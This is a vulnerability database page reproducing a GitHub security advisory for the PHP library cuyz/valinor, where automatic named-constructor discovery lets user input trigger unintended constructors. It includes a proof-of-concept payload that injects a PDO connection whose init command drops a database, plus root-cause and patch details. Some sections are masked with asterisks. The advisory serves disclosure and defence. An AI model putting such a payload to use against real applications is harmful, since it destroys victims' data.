N/A

CVSS Score

Basic Information

CVE ID

GHSA ID

GHSA-xhr8-mpwq-2rr2

EPSS Score

CWE

Published

4/1/2022

Updated

1/11/2023

KEV Status

Technology

PHP

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

GHSA-xhr8-mpwq-2rr2

GHSA-xhr8-mpwq-2rr2:
Automatic named constructor discovery in Valinor

Design issue - automatic constructor discovery

The issue arises when upgrading from cuyz/valinor:0.3.0 to a newer system on an existing application, which broke due to the wrong constructor being picked.

Still, a bigger security concern is problematic, and it is akin to https://github.com/rails/rails/issues/5228.

Example exploit

Take following DTO example:

final class UserDTO
{
    public function __construct(
        public int $id,
        public string $name
    ) {}
    public static function fromDb(
        PDO $connection,
        int $id
    ): self { /* ... code to fetch the DTO here ... */ }
}

There is nothing inherently unsafe about the above UserDTO, but when mixed with cuyz/valinor:^0.5.0 ( specifically https://github.com/CuyZ/Valinor/commit/718d3c1bc2ea7d28b4b1f6c062addcd1dde8660b ), it is an explosive mix:

// this could be coming from user input:
$maliciousPayload = [
    'connection' => [
      'dsn' => 'mysql:host=some-host;database=some-database',
      'username' => 'root',
      'password' => 'root',
      'options' => [
        // PDO::MYSQL_ATTR_INIT_COMMAND === 1002
        1002 => 'DROP DATABASE all-the-moneys'
      ]
    ],
    'id' => 123,
];

$treeMapper->map(
  UserDTO::class,
  $maliciousPayload
); // your DB is gone :D

The above payload is represented in PHP form, but may as well be input JSON, HTML or x-form-urlencoded.

Mitigation

Version 0.7.0 contains a patch for this issue.

Automatic named constructor resolution should be disabled - only explicitly mapped named constructors should be used/discovered.

(GitHub Advisory)

N/A

CVSS Score

Basic Information

CVE ID

GHSA ID

GHSA-xhr8-mpwq-2rr2

EPSS Score

CWE

Published

4/1/2022

Updated

1/11/2023

KEV Status

Technology

PHP

Technical Details

CVSS Vector

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
cuyz/valinor	composer	>= 0.5.0, < 0.7.0	0.7.0

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability stems from automatic named constructor resolution introduced in commit 718d3c1. The ConstructorObjectBuilderFactory handles this resolution by:

findConstructors() gathering all public static methods with parameters that return the class instance (including dangerous ones like fromDb)
for() selecting the 'best match' constructor based on input keys. This automatic discovery allows attackers to invoke unintended constructors by matching parameter names in their payload. The patch in 0.7.0 requires explicit constructor registration, confirming these functions were the root cause.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

## **si*n issu* - *utom*ti* *onstru*tor *is*ov*ry T** issu* *ris*s w**n up*r**in* *rom `*uyz/v*linor:*.*.*` to * n*w*r syst*m on *n *xistin* *ppli**tion, w*i** *rok* *u* to t** wron* *onstru*tor **in* pi*k**. Still, * *i***r s**urity *on**rn is pro

Reasoning

T** vuln*r**ility st*ms *rom *utom*ti* n*m** *onstru*tor r*solution intro*u*** in *ommit *******. T** `*onstru*torO*j**t*uil**r***tory` **n*l*s t*is r*solution *y: *. `*in**onstru*tors()` **t**rin* *ll pu*li* st*ti* m*t*o*s wit* p*r*m*t*rs t**t r*tu

N/A

Basic Information

Concerned about an active attack path?

GHSA-xhr8-mpwq-2rr2: Automatic named constructor discovery in Valinor

Design issue - automatic constructor discovery

Example exploit

Mitigation

N/A

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

GHSA-xhr8-mpwq-2rr2:
Automatic named constructor discovery in Valinor

Vulnerability Intelligence
Miggo AI